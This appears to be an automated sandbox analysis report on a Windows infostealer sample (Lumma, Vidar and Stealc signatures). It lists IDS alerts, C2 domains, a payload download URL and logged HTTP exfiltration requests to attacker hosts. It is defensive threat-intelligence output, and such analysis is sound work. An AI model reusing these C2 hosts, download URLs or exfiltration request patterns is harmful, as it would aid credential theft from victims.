Source: Network traffic	Suricata IDS: 2056406 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (snarlypagowo .site) : 192.168.2.8:61121 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056410 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (treatynreit .site) : 192.168.2.8:59551 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.8:56268 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2056408 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soldiefieop .site) : 192.168.2.8:52448 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chorusarorp .site) : 192.168.2.8:63060 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.8:56237 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.8:56237
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.8:56238
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:56266 -> 172.67.166.76:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:56266 -> 172.67.166.76:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: treatynreit.site
Source: Malware configuration extractor	URLs: questionsmw.stor
Source: Malware configuration extractor	URLs: mysterisop.site
Source: Malware configuration extractor	URLs: soldiefieop.site
Source: Malware configuration extractor	URLs: abnomalrkmu.site
Source: Malware configuration extractor	URLs: absorptioniw.site
Source: Malware configuration extractor	URLs: snarlypagowo.site
Source: Malware configuration extractor	URLs: chorusarorp.site
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869

Detected non-DNS traffic on DNS port

Source: global traffic

TCP traffic: 192.168.2.8:56235 -> 162.159.36.2:53

Downloads executable code via HTTP

Source: global traffic

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 49.12.197.9 49.12.197.9
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View	IP Address: 147.45.44.104 147.45.44.104

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56237 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49714 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49713 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49715 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56240 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56239 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56238 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56241 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56244 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56242 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56245 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56247 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56249 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56250 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56251 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56252 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56253 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56257 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56256 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56255 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56254 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56258 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56265 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:56259 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56262 -> 49.12.197.9:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFIIIJJKJJKEBGIDGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAEBAFBGIDHCBFHIECFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCFHJDBKJKEBFHJEHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 5957Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAECAFHDBGIDGCAEHJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCGDAAKFHIDBFIDBKFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 1081Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAECFCAAECBGDGDHIEHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGDHJECFCFCAKFHCFIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 130417Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBGIIDBKEBFBGCAEBAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: advocachark.store
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: playd.healthnlife.pkCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 3177Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown	TCP traffic detected without corresponding DNS query: 49.12.197.9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

4_2_00406963

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: playd.healthnlife.pkCache-Control: no-cache

Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp

Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: playd.healthnlife.pk
Source: global traffic	DNS traffic detected: DNS query: soldiefieop.site
Source: global traffic	DNS traffic detected: DNS query: questionsmw.store
Source: global traffic	DNS traffic detected: DNS query: abnomalrkmu.site
Source: global traffic	DNS traffic detected: DNS query: chorusarorp.site
Source: global traffic	DNS traffic detected: DNS query: treatynreit.site
Source: global traffic	DNS traffic detected: DNS query: snarlypagowo.site
Source: global traffic	DNS traffic detected: DNS query: mysterisop.site
Source: global traffic	DNS traffic detected: DNS query: absorptioniw.site
Source: global traffic	DNS traffic detected: DNS query: advocachark.store
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org

Source: unknown

Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Http://cowod.hopto.org/form-data;
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, a43486128347[1].exe.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.IDAAECKJDAK
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.IDAAECVWXYZ1234567890isposition:
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.CAEBAK
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgDAAEC--tent-Disposition:
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgDAAEContent-Disposition:
Source: file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoAAKJDAK
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoGCAEBAK
